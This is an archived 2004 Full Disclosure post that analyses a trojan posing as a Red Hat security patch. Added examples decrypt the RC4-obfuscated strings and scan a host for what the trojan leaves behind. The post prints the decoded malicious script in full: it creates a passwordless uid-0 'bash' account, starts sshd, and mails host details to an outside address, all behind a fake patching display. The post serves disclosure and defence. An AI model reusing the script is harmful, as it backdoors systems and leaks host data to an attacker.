Full Disclosure mailing list archives

Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"


From: Andrew Farmer <andfarm () teknovis com>
Date: Sun, 24 Oct 2004 18:18:41 -0700

Hugo van der Kooij wrote:
Be advised.
The message below is currently going around on the internet. Being unsigned
was the first obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasons to suspect it.
Message was sent from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but others might
be.
And while it lasts you may want to get the file for your own educational
purposes.
<snip>

I did a quickie analysis of the program (which is basically just distributed as source!).

Strings are encrypted with arcfour; however, as the keys are included too, decrypting them is no problem.

pswd[] is an initialization vector for arcfour.

shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR

opts[], text[], and chk2[] are encrypted with some (apparently constant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen and running the following shell script:

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
        exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root () addlebrain com >> /dev/null
 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}

echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1

Attachment: PGP.sig
Description: This is a digitally signed message part
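The string recovery described above, as an added example that is not part of the original post or of the trojan's source: a minimal RC4 (arcfour) routine, a constructed key standing in for pswd[], and constructed ciphertext tables standing in for shll[], inlo[], xecc[] and lsto[]. It shows why a key shipped next to the ciphertext gives no secrecy, and reassembles the `/bin/sh -c "exec '%s' \"$@\""` command line the loader ends up running (the script path passed in is an assumed placeholder).

```python
# Added example, not code from the original post or from the trojan itself.
# Minimal RC4 (arcfour) implementation used to show why shipping the key
# next to the ciphertext, as the fake "patch" does, provides no secrecy:
# anyone with the source can run the same routine and read the strings.
# The key and string tables below are constructed for this example; they are
# NOT the real pswd[]/shll[]/inlo[]/xecc[]/lsto[] arrays from the sample.

from typing import Dict, List


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encrypt/decrypt `data` under `key` (the same function does both)."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    # Key-scheduling algorithm (KSA): permute S according to the key bytes.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR data with the keystream.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for the embedded key array (pswd[] in the sample).
PSWD = b"constructed-example-key"

# Constructed plaintexts matching what the post says the tables decode to.
PLAINTEXTS: Dict[str, bytes] = {
    "shll": b"/bin/sh",
    "inlo": b"-c",
    "xecc": b"exec '%s' \"$@\"",
    "lsto": b"",
}

# What an analyst actually finds in the source: ciphertext blobs plus the key.
ENCRYPTED_TABLES: Dict[str, bytes] = {
    name: rc4(PSWD, plain) for name, plain in PLAINTEXTS.items()
}


def decrypt_tables(key: bytes, tables: Dict[str, bytes]) -> Dict[str, str]:
    """Recover every string table with the key that ships alongside it."""
    return {name: rc4(key, blob).decode("latin-1") for name, blob in tables.items()}


def build_argv(tables: Dict[str, str], script_path: str) -> List[str]:
    """Reassemble the command line the loader runs from the decrypted strings:
    /bin/sh -c "exec '<script>' \"$@\"". The script path is an assumed
    placeholder; the sample writes its own temporary file."""
    return [tables["shll"], tables["inlo"], tables["xecc"] % script_path]


if __name__ == "__main__":
    recovered = decrypt_tables(PSWD, ENCRYPTED_TABLES)
    for name, value in recovered.items():
        print(f"{name}[] decodes to: {value!r}")
    print(build_argv(recovered, "/tmp/patch.sh"))
```

The tables keyed off `stat("/bin/sh")` (opts[], text[], chk2[]) are no harder: the stat data is constant on the target, so it is reproduced by running the same call and fed to the same routine.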

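Host checks for the traces the decoded script leaves behind, as an added example that is not part of the original post: a second uid-0 account named "bash" (`adduser -g 0 -u 0 -o bash`), its password removed (`passwd -d bash`), and the marker directory under /tmp whose path components are a dot followed by a space (`." "` in sh). The passwd and shadow lines are constructed samples, and the marker check is parameterised on a root path so it can be exercised in a scratch directory.

```python
# Added example, not code from the original post. Host-side checks for the
# traces the decoded script leaves behind: a second uid-0 account named
# "bash" (adduser -g 0 -u 0 -o bash), its password removed (passwd -d bash),
# and the marker directory it creates under /tmp whose components are a dot
# followed by a space. The passwd/shadow lines below are constructed samples.

import os
import tempfile
from typing import List, Tuple

BACKDOOR_USER = "bash"  # account name used by the decoded script
MARKER_NAME = ". "      # each path component the script creates: `." "` in sh

# Constructed sample of /etc/passwd after the script has run.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
bash:x:0:0::/home/bash:/bin/bash
"""

# Constructed sample of /etc/shadow; `bash` has an empty password field.
SHADOW_SAMPLE = """\
root:$1$constructed$notarealhashxxxxxxxxx:12700:0:99999:7:::
daemon:*:12700:0:99999:7:::
bash::12700:0:99999:7:::
"""


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Names of uid-0 accounts other than root (what `adduser -o -u 0` leaves)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue
        if int(fields[2]) == 0 and fields[0] != "root":
            hits.append(fields[0])
    return hits


def passwordless_accounts(shadow_text: str) -> List[str]:
    """Names whose shadow password field is empty (what `passwd -d` leaves)."""
    hits = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            hits.append(fields[0])
    return hits


def marker_dir_present(root: str = "/") -> bool:
    """True if <root>/tmp/'. ' exists. The script nests several of these,
    but a single dot-space directory in /tmp is already a strong indicator."""
    return os.path.isdir(os.path.join(root, "tmp", MARKER_NAME))


def scan(passwd_text: str, shadow_text: str, root: str = "/") -> List[str]:
    """Collect findings as short strings; an empty list means nothing matched."""
    findings = []
    for name in extra_uid0_accounts(passwd_text):
        findings.append(f"uid-0 account: {name}")
    for name in passwordless_accounts(shadow_text):
        findings.append(f"empty password: {name}")
    if marker_dir_present(root):
        findings.append(f"marker directory: {os.path.join(root, 'tmp', MARKER_NAME)!r}")
    return findings


def demo_marker_check() -> Tuple[bool, bool]:
    """Create the marker path in a scratch root; return (before, after)."""
    with tempfile.TemporaryDirectory() as scratch:
        before = marker_dir_present(scratch)
        os.makedirs(os.path.join(scratch, "tmp", MARKER_NAME))
        after = marker_dir_present(scratch)
    return before, after


if __name__ == "__main__":
    # Against the real host: read /etc/passwd and /etc/shadow (as root) and
    # pass their contents here; the samples above are only for the demo.
    print(scan(PASSWD_SAMPLE, SHADOW_SAMPLE, root="/"))
    print(demo_marker_check())
```

The other two traces in the script are off-host: an outbound mail with subject "Inca o roata" to the address in the script, and an sshd started from /tmp by a user who did not intend to, so the mail log and process list are worth a look as well.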
